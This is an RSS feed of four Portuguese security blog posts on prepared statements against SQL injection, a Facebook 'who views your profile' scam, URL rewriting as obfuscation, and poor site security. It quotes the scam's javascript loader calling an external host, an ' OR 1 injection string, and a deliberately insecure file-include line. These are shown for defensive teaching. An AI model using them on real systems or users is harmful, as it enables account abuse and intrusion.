<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>The Blog of a WebDeveloper &#187; Segurança</title>
	<atom:link href="http://joaopedropereira.com/blog/category/seguranca/feed/" rel="self" type="application/rss+xml" />
	<link>http://joaopedropereira.com/blog</link>
	<description>Um novo estilo de desenvolvimento</description>
	<lastBuildDate>Sun, 19 Feb 2012 19:30:51 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=</generator>
		<item>
		<title>Prepared Statements contra SQL Injection</title>
		<link>http://joaopedropereira.com/blog/2011/07/27/prepared-statements-contra-sql-injection/</link>
		<comments>http://joaopedropereira.com/blog/2011/07/27/prepared-statements-contra-sql-injection/#comments</comments>
		<pubDate>Wed, 27 Jul 2011 21:19:06 +0000</pubDate>
		<dc:creator>João Pedro Pereira</dc:creator>
				<category><![CDATA[PHP]]></category>
		<category><![CDATA[Segurança]]></category>
		<category><![CDATA[Webdevelopment]]></category>
		<category><![CDATA[mysql]]></category>
		<category><![CDATA[OOP]]></category>
		<category><![CDATA[prepared statements]]></category>
		<category><![CDATA[SQL Injection]]></category>

		<guid isPermaLink="false">http://joaopedropereira.com/blog/?p=1045</guid>
		<description><![CDATA[É muito comum quando se estuda uma linguagem não se dar principal foco ao desenvolvimento em segurança, mas este, em ambientes de produção é um dos factores decisivos do sucesso de uma aplicação e da confiança por parte dos utilizadores. Neste artigo vai ser abordada uma forma de defesa relativa a possíveis ataques de SQL [...]]]></description>
			<content:encoded><![CDATA[<!-- Start Shareaholic LikeButtonSetTop Automatic --><!-- End Shareaholic LikeButtonSetTop Automatic --><div class="tweetmeme_button" style="float: left; margin-right: 10px;">
			<a href="http://api.tweetmeme.com/share?url=http%3A%2F%2Fjoaopedropereira.com%2Fblog%2F2011%2F07%2F27%2Fprepared-statements-contra-sql-injection%2F"><br />
				<img src="http://api.tweetmeme.com/imagebutton.gif?url=http%3A%2F%2Fjoaopedropereira.com%2Fblog%2F2011%2F07%2F27%2Fprepared-statements-contra-sql-injection%2F&amp;source=joaoppereira&amp;style=normal&amp;service=bit.ly&amp;b=2" height="61" width="50" /><br />
			</a>
		</div>
<p>É muito comum quando se estuda uma linguagem não se dar principal foco ao desenvolvimento em segurança, mas este, em ambientes de produção é um dos factores decisivos do sucesso de uma aplicação e da confiança por parte dos utilizadores.<br />
Neste artigo vai ser abordada uma forma de defesa relativa a possíveis ataques de SQL Injection em PHP utilizando o SGDB MySQL, e com recurso a Prepared Statements.</p>
<p>Existe suporte oficial a várias bases de dados: CUBRID, MS SQL Server, Firebird/Interbase, IBM, Informix, MySQL, MS SQL Server, Oracle, ODBC e DB2, PostgreSQL, SQLite, 4D [print_r(PDO::getAvailableDrivers());]</p>
<h2>Vantagens e Desvantagens</h2>
<p><span style="text-decoration: underline;"><strong>Vantagens:</strong></span><br />
i. Previne SQL Injection<br />
ii. Melhora a performance (pode só ser notado quando usado em grandes plataformas)<br />
iii. Mais simples de escrever e ler</p>
<p><span style="text-decoration: underline;"><strong>Desvantagens e Limitações:</strong></span><br />
i. Limitado a: SELECT, INSERT, UPDATE, REPLACE, DELETE, e CREATE TABLE<br />
ii. Placeholders apenas para valores e nunca para nomes de tabelas ou colunas<br />
iii. Quando precisamos de utilizar o método bind_result no escopo de uma classe e não sabemos à partida quantas variáveis vão ser passadas. Problema analisado por Jeffrey Way @ NetTuts (http://net.tutsplus.com/tutorials/php/the-problem-with-phps-prepared-statements/)</p>
<h2>addslashes vs mysql_real_escape_string vs Prepared Statements</h2>
<p>As funções addslashes e mysql_real_escape_string não serão objecto de estudo neste artigo, será apenas faladas as vulnerabilidades que não acontecem com o uso de Prepared Statements de modo a mostrar que esta última alternativa é de facto a mais segura.</p>
<p>O Chris Shiflett (<a title="addslashes() Versus mysql_real_escape_string()" href="http://shiflett.org/archive/184" target="_blank">http://shiflett.org/archive/184</a>) já analisou as vulnerabilidades das addslashes relativas ao abuso de caracteres multibyte.</p>
<p>A função mysql_real_escape_string não é muito diferente da addslashes ao nível do tipo de vulnerabilidade, na verdade a sua vantagem reside mesmo em ter em conta o character set a ser utilizado conseguindo determinar como analisar a informção passada. Contudo continuam a existir vulnerabilidades, por exemplo com a utilização da codificação GBK e da sequ?ncia 0xbf27 (¿’) que passada nesta função não terá o resultado pretendido de ¿\’ . (POC <a title="mysql_real_escape_string() versus Prepared Statements" href="http://ilia.ws/archives/103-mysql_real_escape_string-versus-Prepared-Statements.html" target="_blank">http://ilia.ws/archives/103-mysql_real_escape_string-versus-Prepared-Statements.html</a> )</p>
<h2>Prepared Statements em Uso</h2>
<p>Vejamos então um exemplo bastante simples&#8230;</p>

<div class="wp_syntax"><div class="code"><pre class="php" style="font-family:monospace;"><span style="color: #000088;">$login</span> <span style="color: #339933;">=</span> <span style="color: #000088;">$_GET</span><span style="color: #009900;">&#91;</span><span style="color: #0000ff;">'login'</span><span style="color: #009900;">&#93;</span>
<span style="color: #000088;">$query</span> <span style="color: #339933;">=</span> <span style="color: #0000ff;">&quot;SELECT * FROM registos WHERE login = '<span style="color: #006699; font-weight: bold;">$login</span>'&quot;</span><span style="color: #339933;">;</span></pre></div></div>

<p>em que /?login=&#8217; OR 1&#8242;;</p>
<p>Assim sendo<br />
A query ficará algo do género:</p>

<div class="wp_syntax"><div class="code"><pre class="php" style="font-family:monospace;"><span style="color: #000088;">$query</span> <span style="color: #339933;">=</span> <span style="color: #0000ff;">&quot;SELECT * FROM registos WHERE login = '' OR 1&quot;</span><span style="color: #339933;">;</span></pre></div></div>

<p>O que resultaria num retorno de todas as informações da base de dados.</p>
<p>Se neste caso especifico fosse utilizado o método de destaque deste artigo: Prepared Statements, teriamos de colocar um placeholder (para marcar o local onde serão inseridos os dados a introduzir / consultar na base de dados, isto faz com que nos locais onde estão colocados os placeholders não sejam feitos pedidos à base de dados ou alteração ao pedido em questão. É aqui que reside a força deste método.</p>
<p>Existem duas formas de usar placeholders tal como referido no Manual do PHP.net</p>
<p>Forma #1:</p>

<div class="wp_syntax"><div class="code"><pre class="php" style="font-family:monospace;"><span style="color: #000088;">$stmt</span> <span style="color: #339933;">=</span> <span style="color: #000088;">$dbh</span><span style="color: #339933;">-&gt;</span><span style="color: #004000;">prepare</span><span style="color: #009900;">&#40;</span><span style="color: #0000ff;">&quot;INSERT INTO REGISTRY (name, value) VALUES (:name, :value)&quot;</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span>
<span style="color: #000088;">$stmt</span><span style="color: #339933;">-&gt;</span><span style="color: #004000;">bindParam</span><span style="color: #009900;">&#40;</span><span style="color: #0000ff;">':name'</span><span style="color: #339933;">,</span> <span style="color: #000088;">$name</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span>
<span style="color: #000088;">$stmt</span><span style="color: #339933;">-&gt;</span><span style="color: #004000;">bindParam</span><span style="color: #009900;">&#40;</span><span style="color: #0000ff;">':value'</span><span style="color: #339933;">,</span> <span style="color: #000088;">$value</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span></pre></div></div>

<p>Forma #2:</p>

<div class="wp_syntax"><div class="code"><pre class="php" style="font-family:monospace;"><span style="color: #000088;">$stmt</span> <span style="color: #339933;">=</span> <span style="color: #000088;">$dbh</span><span style="color: #339933;">-&gt;</span><span style="color: #004000;">prepare</span><span style="color: #009900;">&#40;</span><span style="color: #0000ff;">&quot;INSERT INTO REGISTRY (name, value) VALUES (?, ?)&quot;</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span>
<span style="color: #000088;">$stmt</span><span style="color: #339933;">-&gt;</span><span style="color: #004000;">bindParam</span><span style="color: #009900;">&#40;</span><span style="color: #cc66cc;">1</span><span style="color: #339933;">,</span> <span style="color: #000088;">$name</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span>
<span style="color: #000088;">$stmt</span><span style="color: #339933;">-&gt;</span><span style="color: #004000;">bindParam</span><span style="color: #009900;">&#40;</span><span style="color: #cc66cc;">2</span><span style="color: #339933;">,</span> <span style="color: #000088;">$value</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span></pre></div></div>

<p>Voltando então ao exemplo anterior, a nossa expressão seria então:</p>

<div class="wp_syntax"><div class="code"><pre class="php" style="font-family:monospace;"><span style="color: #000088;">$query</span> <span style="color: #339933;">=</span> <span style="color: #0000ff;">&quot;SELECT * FROM registos WHERE login = ?&quot;</span><span style="color: #339933;">;</span></pre></div></div>

<p>Nota: Apesar da extensão MySQLi também suportar prepared statements é aconselhável a utilização da extensão PDO (PHP Data Objects)</p>

<div class="wp_syntax"><div class="code"><pre class="php" style="font-family:monospace;"><span style="color: #000088;">$login</span> <span style="color: #339933;">=</span> <span style="color: #0000ff;">&quot;joaoppereira&quot;</span><span style="color: #339933;">;</span>
<span style="color: #000088;">$query</span> <span style="color: #339933;">=</span> <span style="color: #0000ff;">&quot;SELECT * FROM registos WHERE login = ?&quot;</span><span style="color: #339933;">;</span>
&nbsp;
<span style="color: #000088;">$stmt</span> <span style="color: #339933;">=</span> <span style="color: #000088;">$pdo</span><span style="color: #339933;">-&gt;</span><span style="color: #004000;">prepare</span><span style="color: #009900;">&#40;</span><span style="color: #000088;">$query</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> 
<span style="color: #000088;">$stmt</span><span style="color: #339933;">-&gt;</span><span style="color: #004000;">bindValue</span><span style="color: #009900;">&#40;</span><span style="color: #cc66cc;">1</span><span style="color: #339933;">,</span> <span style="color: #000088;">$login</span><span style="color: #339933;">,</span> PDO<span style="color: #339933;">::</span><span style="color: #004000;">PARAM_STR</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span>
<span style="color: #000088;">$ok</span> <span style="color: #339933;">=</span> <span style="color: #000088;">$stmt</span><span style="color: #339933;">-&gt;</span><span style="color: #004000;">execute</span><span style="color: #009900;">&#40;</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span>
<span style="color: #000088;">$results</span> <span style="color: #339933;">=</span> <span style="color: #000088;">$stmt</span><span style="color: #339933;">-&gt;</span><span style="color: #004000;">fetchAll</span><span style="color: #009900;">&#40;</span>PDO<span style="color: #339933;">::</span><span style="color: #004000;">FETCH_ASSOC</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span></pre></div></div>

<p>A função bindValue dos PDOStatement permite simples validações de tipo de dados no terceiro parâmetro da função bindValue(parametro, valor, tipo_dado), com as seguintes opções:</p>
<pre>- PDO::PARAM_STR
- PDO::PARAM_INT
- PDO::PARAM_BOOL
- PDO::PARAM_NULL</pre>
<p>Este foi só um artigo introdutório a este tema, existe agora imenso material no Manual do PHP.net e um pouco por toda a internet relativamente a esta temática para os que quiserem, e bem, aprofundar os conhecimentos relativos a Prepared Statements e PDO.</p>
<h3>Bibliografia:</h3>
<p>- <a title="Prepared statements and stored procedures" href="http://php.net/manual/en/pdo.prepared-statements.php" target="_blank">http://php.net/manual/en/pdo.prepared-statements.php</a><br />
- <a title="The PDOStatement class" href="http://www.php.net/manual/en/class.pdostatement.php" target="_blank">http://www.php.net/manual/en/class.pdostatement.php</a><br />
- <a title="PDOStatement->bindValue&#8221; href=&#8221;http://www.php.net/manual/en/pdostatement.bindvalue.php&#8221; target=&#8221;_blank&#8221;>http://www.php.net/manual/en/pdostatement.bindvalue.php</a><br />
- <a title="Predefined Constants  " href="http://www.php.net/manual/en/pdo.constants.php" target="_blank">http://www.php.net/manual/en/pdo.constants.php</a><br />
- <a title="PDO Drivers" href="http://www.php.net/manual/en/pdo.drivers.php" target="_blank">http://www.php.net/manual/en/pdo.drivers.php</a><br />
- <a title="The Problem with PHP’s Prepared Statements" href="http://net.tutsplus.com/tutorials/php/the-problem-with-phps-prepared-statements/" target="_blank">http://net.tutsplus.com/tutorials/php/the-problem-with-phps-prepared-statements/</a></p>
<div class="shr-publisher-1045"></div><!-- Start Shareaholic LikeButtonSetBottom Automatic --><div style="clear: both; min-height: 1px; height: 3px; width: 100%;"></div><div class='shareaholic-like-buttonset' style='float:none;height:30px;'><a class='shareaholic-fblike' data-shr_layout='button_count' data-shr_showfaces='false' data-shr_href='http%3A%2F%2Fjoaopedropereira.com%2Fblog%2F2011%2F07%2F27%2Fprepared-statements-contra-sql-injection%2F' data-shr_title='Prepared+Statements+contra+SQL+Injection'></a><a class='shareaholic-fbsend' data-shr_href='http%3A%2F%2Fjoaopedropereira.com%2Fblog%2F2011%2F07%2F27%2Fprepared-statements-contra-sql-injection%2F'></a><a class='shareaholic-googleplusone' data-shr_size='medium' data-shr_count='true' data-shr_href='http%3A%2F%2Fjoaopedropereira.com%2Fblog%2F2011%2F07%2F27%2Fprepared-statements-contra-sql-injection%2F' data-shr_title='Prepared+Statements+contra+SQL+Injection'></a></div><div style="clear: both; min-height: 1px; height: 3px; width: 100%;"></div><!-- End Shareaholic LikeButtonSetBottom Automatic -->]]></content:encoded>
			<wfw:commentRss>http://joaopedropereira.com/blog/2011/07/27/prepared-statements-contra-sql-injection/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>Análise Facebook: See who views your profile</title>
		<link>http://joaopedropereira.com/blog/2011/04/23/analise-facebook-see-who-views-your-profile/</link>
		<comments>http://joaopedropereira.com/blog/2011/04/23/analise-facebook-see-who-views-your-profile/#comments</comments>
		<pubDate>Sat, 23 Apr 2011 16:10:45 +0000</pubDate>
		<dc:creator>João Pedro Pereira</dc:creator>
				<category><![CDATA[JavaScript]]></category>
		<category><![CDATA[Segurança]]></category>
		<category><![CDATA[facebook]]></category>

		<guid isPermaLink="false">http://joaopedropereira.com/blog/?p=1038</guid>
		<description><![CDATA[Para quem não reparou ainda há a circular uma praga no Facebook que utiliza o motivo de permitir ver quem visita o perfil ! Esta página incita o utilizador executar o seguinte código no browser tendo a página do facebook aberta. javascript:&#40;a=&#40;b=document&#41;.createElement&#40;'script'&#41;&#41;.src='//bbbindia4.in/jsp.php',b.body.appendChild&#40;a&#41;;void&#40;0&#41; Este código simplesmente adiciona o código presente na página bbindia4.in/jsp.php à página do [...]]]></description>
			<content:encoded><![CDATA[<!-- Start Shareaholic LikeButtonSetTop Automatic --><!-- End Shareaholic LikeButtonSetTop Automatic --><div class="tweetmeme_button" style="float: left; margin-right: 10px;">
			<a href="http://api.tweetmeme.com/share?url=http%3A%2F%2Fjoaopedropereira.com%2Fblog%2F2011%2F04%2F23%2Fanalise-facebook-see-who-views-your-profile%2F"><br />
				<img src="http://api.tweetmeme.com/imagebutton.gif?url=http%3A%2F%2Fjoaopedropereira.com%2Fblog%2F2011%2F04%2F23%2Fanalise-facebook-see-who-views-your-profile%2F&amp;source=joaoppereira&amp;style=normal&amp;service=bit.ly&amp;b=2" height="61" width="50" /><br />
			</a>
		</div>
<p>Para quem não reparou ainda há a circular uma praga no Facebook que utiliza o motivo de permitir ver quem visita o perfil !</p>
<p style="text-align: center;"><a href="http://joaopedropereira.com/blog/wp-content/uploads/2011/04/whoviewprofile_facebook.png" target="_blank"><img class="size-medium wp-image-1039 aligncenter" title="Facebook: See who views your profile" src="http://joaopedropereira.com/blog/wp-content/uploads/2011/04/whoviewprofile_facebook-300x231.png" alt="" width="300" height="231" /></a></p>
<p>Esta página incita o utilizador executar o seguinte código no browser tendo a página do facebook aberta.</p>

<div class="wp_syntax"><div class="code"><pre class="javascript" style="font-family:monospace;">javascript<span style="color: #339933;">:</span><span style="color: #009900;">&#40;</span>a<span style="color: #339933;">=</span><span style="color: #009900;">&#40;</span>b<span style="color: #339933;">=</span>document<span style="color: #009900;">&#41;</span>.<span style="color: #660066;">createElement</span><span style="color: #009900;">&#40;</span><span style="color: #3366CC;">'script'</span><span style="color: #009900;">&#41;</span><span style="color: #009900;">&#41;</span>.<span style="color: #660066;">src</span><span style="color: #339933;">=</span><span style="color: #3366CC;">'//bbbindia4.in/jsp.php'</span><span style="color: #339933;">,</span>b.<span style="color: #660066;">body</span>.<span style="color: #660066;">appendChild</span><span style="color: #009900;">&#40;</span>a<span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span>void<span style="color: #009900;">&#40;</span><span style="color: #CC0000;">0</span><span style="color: #009900;">&#41;</span></pre></div></div>

<p>Este código simplesmente adiciona o código presente na página bbindia4.in/jsp.php à página do facebook. (em anexo  no fim do post)</p>
<p><span style="font-family: 'Times New Roman'; line-height: normal; font-size: medium;"> </span></p>
<p style="display: inline !important;">Este ficheiro contém código JavaScript que vai criar um novo evento e convidar todos os amigos, vai ainda abrir uma conversa de chat e colocar uma mensagem com o link para o contacto em questão também sofrer o mesmo &#8220;ataque&#8221; e vai colocar uma mensagem no próprio Mural com números aleatórios e nomes de contactos aleatórios como se fossem as pessoas que mais vêm o perfil <img src='http://joaopedropereira.com/blog/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> !</p>
<p style="display: inline !important;">&nbsp;</p>
<p>Isto apenas volta a mostrar que por mais segura que uma página seja os utilizadores podem ser sempre enganados tornando a página insegura !</p>
<p>&nbsp;</p>
<p>Stay safe.</p>
<p>&nbsp;</p>
<p><span style="text-decoration: underline;"><strong>Anexo:</strong></span> <a title="jsp.php.txt" href="http://feupload.fe.up.pt/get/YLuS4rOIiq2zybE" target="_blank">jsp.php.txt</a></p>
<p>&nbsp;</p>
<div class="shr-publisher-1038"></div><!-- Start Shareaholic LikeButtonSetBottom Automatic --><div style="clear: both; min-height: 1px; height: 3px; width: 100%;"></div><div class='shareaholic-like-buttonset' style='float:none;height:30px;'><a class='shareaholic-fblike' data-shr_layout='button_count' data-shr_showfaces='false' data-shr_href='http%3A%2F%2Fjoaopedropereira.com%2Fblog%2F2011%2F04%2F23%2Fanalise-facebook-see-who-views-your-profile%2F' data-shr_title='An%C3%A1lise+Facebook%3A+See+who+views+your+profile'></a><a class='shareaholic-fbsend' data-shr_href='http%3A%2F%2Fjoaopedropereira.com%2Fblog%2F2011%2F04%2F23%2Fanalise-facebook-see-who-views-your-profile%2F'></a><a class='shareaholic-googleplusone' data-shr_size='medium' data-shr_count='true' data-shr_href='http%3A%2F%2Fjoaopedropereira.com%2Fblog%2F2011%2F04%2F23%2Fanalise-facebook-see-who-views-your-profile%2F' data-shr_title='An%C3%A1lise+Facebook%3A+See+who+views+your+profile'></a></div><div style="clear: both; min-height: 1px; height: 3px; width: 100%;"></div><!-- End Shareaholic LikeButtonSetBottom Automatic -->]]></content:encoded>
			<wfw:commentRss>http://joaopedropereira.com/blog/2011/04/23/analise-facebook-see-who-views-your-profile/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>URL Rewriting contra ataques ?(!)</title>
		<link>http://joaopedropereira.com/blog/2010/08/27/url-rewriting-contra-ataques/</link>
		<comments>http://joaopedropereira.com/blog/2010/08/27/url-rewriting-contra-ataques/#comments</comments>
		<pubDate>Fri, 27 Aug 2010 10:39:54 +0000</pubDate>
		<dc:creator>João Pedro Pereira</dc:creator>
				<category><![CDATA[Optimização]]></category>
		<category><![CDATA[Segurança]]></category>
		<category><![CDATA[SEO]]></category>
		<category><![CDATA[Webdevelopment]]></category>
		<category><![CDATA[htaccess]]></category>
		<category><![CDATA[SQL Injection]]></category>

		<guid isPermaLink="false">http://joaopedropereira.com/blog/?p=926</guid>
		<description><![CDATA[O URL Rewriting ganhou muitos adeptos quando surgiu a moda das SEO (Search Engine Optimization) e das USO (User Scan Optimization) de forma a tornar as ligações de mais fácil leitura e percepção do seu conteúdo quer para os Motores de Pesquisa quer para o scan que o nosso cérebro faz quando olha para uma [...]]]></description>
			<content:encoded><![CDATA[<!-- Start Shareaholic LikeButtonSetTop Automatic --><!-- End Shareaholic LikeButtonSetTop Automatic --><div class="tweetmeme_button" style="float: left; margin-right: 10px;">
			<a href="http://api.tweetmeme.com/share?url=http%3A%2F%2Fjoaopedropereira.com%2Fblog%2F2010%2F08%2F27%2Furl-rewriting-contra-ataques%2F"><br />
				<img src="http://api.tweetmeme.com/imagebutton.gif?url=http%3A%2F%2Fjoaopedropereira.com%2Fblog%2F2010%2F08%2F27%2Furl-rewriting-contra-ataques%2F&amp;source=joaoppereira&amp;style=normal&amp;service=bit.ly&amp;b=2" height="61" width="50" /><br />
			</a>
		</div>
<p>O URL Rewriting ganhou muitos adeptos quando surgiu a moda das SEO (Search Engine Optimization) e das USO (User Scan Optimization) de forma a tornar as ligações de mais fácil leitura e percepção do seu conteúdo quer para os Motores de Pesquisa quer para o scan que o nosso cérebro faz quando olha para uma ligação, e é normalmente com este intuito que é utilizado.</p>
<p>Contudo, é possível utilizar URL Rewriting para melhorar a segurança do seu site.</p>
<p style="text-align: center;"><a href="http://joaopedropereira.com/blog/wp-content/uploads/2010/08/obfuscation.jpg"><img class="aligncenter size-full wp-image-927" title="obfuscation" src="http://joaopedropereira.com/blog/wp-content/uploads/2010/08/obfuscation.jpg" alt="" width="360" height="450" /></a></p>
<p><strong>ATENÇÃO: Não é seguro confiar neste método para a obtenção de um site seguro, este é apenas um método possível de obfuscação, isto é, para tornar mais dificil de perceber onde poderão estar as falhas, principalmente para ferramentas automáticas de pentesting!</strong></p>
<p>Imaginemos o seguinte URL:</p>
<p>http://exemplo.pt/pagina.php?id=13&#038;titulo=AppVulneravel</p>
<p>Uma ferramenta automática de SQL Injection fazia parsing do URL e detectava dois parâmetros com dois valores: ( id =&gt; 13, titulo =&gt; &#8216;AppVulneravel&#8217; ) .</p>
<p>Utilizando o seguinte ficheiro .htaccess:</p>

<div class="wp_syntax"><div class="code"><pre class="htaccess" style="font-family:monospace;"># Turn on URL rewriting
RewriteEngine On
&nbsp;
# Allow any files or directories that exist to be displayed directly
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
&nbsp;
RewriteRule ^pagina/(.+)/(.+) pagina.php?id=$1&amp;amp;titulo=$2 [PT,L]</pre></div></div>

<p>Já podíamos chamar a mesma página da seguinte forma:</p>
<p>http://exemplo.pt/pagina/13/AppVulneravel</p>
<p>A mesma ferramenta automática mais dificilmente chegaria a verificar se 13 e AppVulneravel não eram directórios e estávamos a trabalhar no index desse directório.</p>
<p>Neste caso, um olhar sobre o URL e percebia-se que estava a ser usado URL Rewriting e podia-se tentar explorar vulnerabilidades a partir desses parâmetros e/ou configurado uma ferramenta para fazer os testes correctamente tendo em conta essa informação.</p>
<p>Mas um outro exemplo:</p>
<p>pagina.php</p>

<div class="wp_syntax"><div class="code"><pre class="php" style="font-family:monospace;"><span style="color: #b1b100;">include</span><span style="color: #009900;">&#40;</span><span style="color: #000088;">$_GET</span><span style="color: #009900;">&#91;</span><span style="color: #0000ff;">'file'</span><span style="color: #009900;">&#93;</span><span style="color: #339933;">.</span><span style="color: #0000ff;">'.php'</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> <span style="color: #666666; font-style: italic;">// ATENÇÃO: Este código é altamente inseguro! Só para fins demonstrativos!</span></pre></div></div>

<p>Tirando partido do código anterior podíamos ter os seguintes URLs:</p>
<p>http://exemplo.pt/index</p>
<p>http://exemplo.pt/about</p>
<p>Sem conhecer o site em questão eu diria que teriam um ficheiro .htaccess semelhante a este:</p>

<div class="wp_syntax"><div class="code"><pre class="htaccess" style="font-family:monospace;"># Turn on URL rewriting
RewriteEngine On
&nbsp;
# Allow any files or directories that exist to be displayed directly
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
&nbsp;
RewriteRule ^(home)$ index.php [PT,L]
RewriteRule ^(about)$ about.php [PT,L]</pre></div></div>

<p>Contudo, neste contexto, seria algo mais como:</p>

<div class="wp_syntax"><div class="code"><pre class="htaccess" style="font-family:monospace;"># Turn on URL rewriting
RewriteEngine On
&nbsp;
# Allow any files or directories that exist to be displayed directly
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
&nbsp;
RewriteRule ^(.+) pagina.php?file=$1 [PT,L]</pre></div></div>

<h2>Conclusão</h2>
<p>Podemos ver que este método é excelente para dificultar a tarefa a script kiddies e crackers com ferramentas de crawling com pesquisa de vulnerabilidades, pode também diminuir os pontos de teste de possíveis atacantes, como é mostrado neste último exemplo. No entanto, é preciso ter em muita atenção o que já referi anteriormente: Não é seguro confiar neste método para a obtenção de um site seguro, este é apenas um método possível de obfuscação, isto é, para tornar mais dificil de perceber onde poderão estar as falhas, principalmente para ferramentas automáticas de pentesting!</p>
<div class="shr-publisher-926"></div><!-- Start Shareaholic LikeButtonSetBottom Automatic --><div style="clear: both; min-height: 1px; height: 3px; width: 100%;"></div><div class='shareaholic-like-buttonset' style='float:none;height:30px;'><a class='shareaholic-fblike' data-shr_layout='button_count' data-shr_showfaces='false' data-shr_href='http%3A%2F%2Fjoaopedropereira.com%2Fblog%2F2010%2F08%2F27%2Furl-rewriting-contra-ataques%2F' data-shr_title='URL+Rewriting+contra+ataques+%3F%28%21%29'></a><a class='shareaholic-fbsend' data-shr_href='http%3A%2F%2Fjoaopedropereira.com%2Fblog%2F2010%2F08%2F27%2Furl-rewriting-contra-ataques%2F'></a><a class='shareaholic-googleplusone' data-shr_size='medium' data-shr_count='true' data-shr_href='http%3A%2F%2Fjoaopedropereira.com%2Fblog%2F2010%2F08%2F27%2Furl-rewriting-contra-ataques%2F' data-shr_title='URL+Rewriting+contra+ataques+%3F%28%21%29'></a></div><div style="clear: both; min-height: 1px; height: 3px; width: 100%;"></div><!-- End Shareaholic LikeButtonSetBottom Automatic -->]]></content:encoded>
			<wfw:commentRss>http://joaopedropereira.com/blog/2010/08/27/url-rewriting-contra-ataques/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Web Security &#8211; You&#8217;re Doing it WRONG</title>
		<link>http://joaopedropereira.com/blog/2010/08/25/web-security-youre-doing-it-wrong/</link>
		<comments>http://joaopedropereira.com/blog/2010/08/25/web-security-youre-doing-it-wrong/#comments</comments>
		<pubDate>Wed, 25 Aug 2010 10:33:20 +0000</pubDate>
		<dc:creator>João Pedro Pereira</dc:creator>
				<category><![CDATA[Segurança]]></category>
		<category><![CDATA[Webdevelopment]]></category>
		<category><![CDATA[injection]]></category>
		<category><![CDATA[sql]]></category>
		<category><![CDATA[vulnerabilidade]]></category>
		<category><![CDATA[xss]]></category>

		<guid isPermaLink="false">http://joaopedropereira.com/blog/?p=906</guid>
		<description><![CDATA[É triste o estado de descuido em que se encontram a maior parte dos WebSites nacionais&#8230; Não falo ao nível de organização, acessibilidade, usabilidade, design&#8230; mas sim ao nível da segurança, ou melhor, à falta dela&#8230; Navegar por sites de grandes empresas, de universidades e respectivas faculdades, de sites governamentais, etc. aleatoriamente é quase como [...]]]></description>
			<content:encoded><![CDATA[<!-- Start Shareaholic LikeButtonSetTop Automatic --><!-- End Shareaholic LikeButtonSetTop Automatic --><div class="tweetmeme_button" style="float: left; margin-right: 10px;">
			<a href="http://api.tweetmeme.com/share?url=http%3A%2F%2Fjoaopedropereira.com%2Fblog%2F2010%2F08%2F25%2Fweb-security-youre-doing-it-wrong%2F"><br />
				<img src="http://api.tweetmeme.com/imagebutton.gif?url=http%3A%2F%2Fjoaopedropereira.com%2Fblog%2F2010%2F08%2F25%2Fweb-security-youre-doing-it-wrong%2F&amp;source=joaoppereira&amp;style=normal&amp;service=bit.ly&amp;b=2" height="61" width="50" /><br />
			</a>
		</div>
<p style="text-align: justify;">É triste o estado de descuido em que se encontram a maior parte dos WebSites nacionais&#8230; Não falo ao nível de organização, acessibilidade, usabilidade, design&#8230; mas sim ao nível da segurança, ou melhor, à falta dela&#8230;</p>
<p style="text-align: justify;"><img class="aligncenter size-full wp-image-907" title="XSS Mosquito" src="http://joaopedropereira.com/blog/wp-content/uploads/2010/08/misquito2.jpg" alt="" width="242" height="179" /></p>
<p style="text-align: justify;">Navegar por sites de grandes empresas, de universidades e respectivas faculdades, de sites governamentais, etc. aleatoriamente é quase como encontrar a cada clique um potencial alvo de ataque, quer ao site em si só para fazer defaces estúpidos, quer para atacar os seus visitantes ou para roubar dados e bases de dados importantes.</p>
<p style="text-align: justify;">Porquê que isto acontece ? Porque é que não há cuidado em aplicar filtros nos formulários e nas querys que são feitas client-side  ? Existem já filtros desenvolvidos, open-source, que podiam ser aplicados rapidamente aquando do processo de desenvolvimento e que mais ou menos eficientes já eram algo melhor do que nada!! Não custava nem uma hora no desenvolvimento final de um website, e para empresas cujo negócio é o desenvolvimento de soluções web à medida para grandes entidades é inadmissível nunca se terem preocupado em criar uma solução por mais simples que fosse para aplicar a todos os seus trabalhos&#8230;</p>
<p style="text-align: justify;">Depois há sempre os bons da fita que quando se apercebem de alguma coisa avisam os developers do site em questão e tentam ajudar. Quando isto acontece existem três tipos de empresas / pessoas:<br />
- não ligam nenhum à sugestão dada e o site continua vulnerável<br />
- ameaçam a pessoa que os está a alertar de lhes pôr um processo em cima (aqui ainda não percebi se é com medo que se peça dinheiro ou que fale com o cliente afectado)<br />
- agradecem a sugestão, corrigem o erro e em alguns casos oferecem recompensas (dinheiro, serviços e até empregos)</p>
<p style="text-align: justify;">Eu pessoalmente já tive estas experiências e desde que as minhas boas intenções foram levadas a mal e fui ameaçado por uma grande empresa portuguesa de desenvolvimento web que deixei de me interessar por ajudar.</p>
